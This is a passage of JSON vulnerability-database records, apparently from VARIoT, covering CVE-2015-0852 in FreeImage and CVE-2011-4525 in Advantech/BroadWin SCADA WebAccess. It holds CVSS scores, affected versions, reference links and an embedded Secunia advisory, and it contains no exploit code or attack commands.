"https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b" }, { "title": "nixos-issue-db-example", "trust": 0.1, "url": "https://github.com/andir/nixos-issue-db-example " } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULMON", "id": "CVE-2015-0852" }, { "db": "JVNDB", "id": "JVNDB-2015-005003" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-189", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-005003" }, { "db": "NVD", "id": "CVE-2015-0852" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://www.openwall.com/lists/oss-security/2015/08/28/1" }, { "trust": 1.8, "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=797165" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-september/167766.html" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0852" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201701-68" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3392" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172491.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172583.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1034077" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-october/168000.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-october/168023.html" }, { "trust": 1.1, "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0852" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0852" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/189.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.debian.org/security/./dsa-3392" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5684" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5684" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0852" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULMON", "id": "CVE-2015-0852" }, { "db": "JVNDB", "id": "JVNDB-2015-005003" }, { "db": "PACKETSTORM", "id": "140773" }, { "db": "PACKETSTORM", "id": "134214" }, { "db": "CNNVD", "id": "CNNVD-201509-588" }, { "db": "NVD", "id": "CVE-2015-0852" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULMON", "id": "CVE-2015-0852" }, { "db": "JVNDB", "id": "JVNDB-2015-005003" }, { "db": "PACKETSTORM", "id": "140773" }, { "db": "PACKETSTORM", "id": "134214" }, { "db": "CNNVD", "id": "CNNVD-201509-588" }, { "db": "NVD", "id": "CVE-2015-0852" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00430" }, { "date": "2015-09-29T00:00:00", "db": "VULMON", "id": "CVE-2015-0852" }, { "date": "2015-10-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-005003" }, { "date": "2017-01-30T16:57:07", "db": "PACKETSTORM", "id": "140773" }, { "date": "2015-11-04T16:41:38", "db": "PACKETSTORM", "id": "134214" }, { "date": "2015-09-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201509-588" }, { "date": "2015-09-29T18:59:00.147000", "db": "NVD", "id": "CVE-2015-0852" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00430" }, { "date": "2019-01-16T00:00:00", "db": "VULMON", "id": "CVE-2015-0852" }, { "date": "2015-10-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-005003" }, { "date": "2015-10-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201509-588" }, { "date": "2024-11-21T02:23:51.313000", "db": "NVD", "id": "CVE-2015-0852" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201509-588" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "FreeImage of PluginPCX.cpp Vulnerable to integer underflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-005003" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "digital error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201509-588" } ], "trust": 0.6 } }
var-201202-0039
Vulnerability from variot
Advantech/BroadWin WebAccess before 7.0 allows remote attackers to trigger the extraction of arbitrary web content into a batch file on a client system, and execute this batch file, via unspecified vectors. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. A security vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0039", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1a0232e8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0660" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001549" }, { "db": "CNNVD", "id": "CNNVD-201202-405" }, { "db": "NVD", "id": "CVE-2011-4525" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001549" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2011-4525", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2011-4525", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2011-4525", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "1a0232e8-2354-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-52470", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2011-4525", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2011-4525", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-405", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "1a0232e8-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-52470", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "1a0232e8-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52470" }, { "db": "JVNDB", "id": "JVNDB-2012-001549" }, { "db": "CNNVD", "id": "CNNVD-201202-405" }, { "db": "NVD", "id": "CVE-2011-4525" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess before 7.0 allows remote attackers to trigger the extraction of arbitrary web content into a batch file on a client system, and execute this batch file, via unspecified vectors. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. A security vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2011-4525" }, { "db": "JVNDB", "id": "JVNDB-2012-001549" }, { "db": "CNVD", "id": "CNVD-2012-0660" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1a0232e8-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52470" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2011-4525", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNVD", "id": "CNVD-2012-0660", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201202-405", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001549", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1A0232E8-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-52470", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1a0232e8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0660" }, { "db": "VULHUB", "id": "VHN-52470" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001549" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-405" }, { "db": "NVD", "id": "CVE-2011-4525" } ] }, "id": "VAR-201202-0039", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1a0232e8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0660" }, { "db": "VULHUB", "id": "VHN-52470" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1a0232e8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0660" } ] }, "last_update_date": "2024-11-23T21:46:31.325000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess File Operation Vulnerability (CNVD-2012-0660)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10172" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0660" }, { "db": "JVNDB", "id": "JVNDB-2012-001549" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-264", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-52470" }, { "db": "JVNDB", "id": "JVNDB-2012-001549" }, { "db": "NVD", "id": "CVE-2011-4525" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4525" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4525" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0660" }, { "db": "VULHUB", "id": "VHN-52470" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001549" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-405" }, { "db": "NVD", "id": "CVE-2011-4525" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1a0232e8-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0660" }, { "db": "VULHUB", "id": "VHN-52470" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001549" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-405" }, { "db": "NVD", "id": "CVE-2011-4525" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1a0232e8-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0660" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-52470" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001549" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-405" }, { "date": "2012-02-21T13:31:56.033000", "db": "NVD", "id": "CVE-2011-4525" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0660" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-52470" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001549" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-405" }, { "date": "2024-11-21T01:32:28.790000", "db": "NVD", "id": "CVE-2011-4525" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", 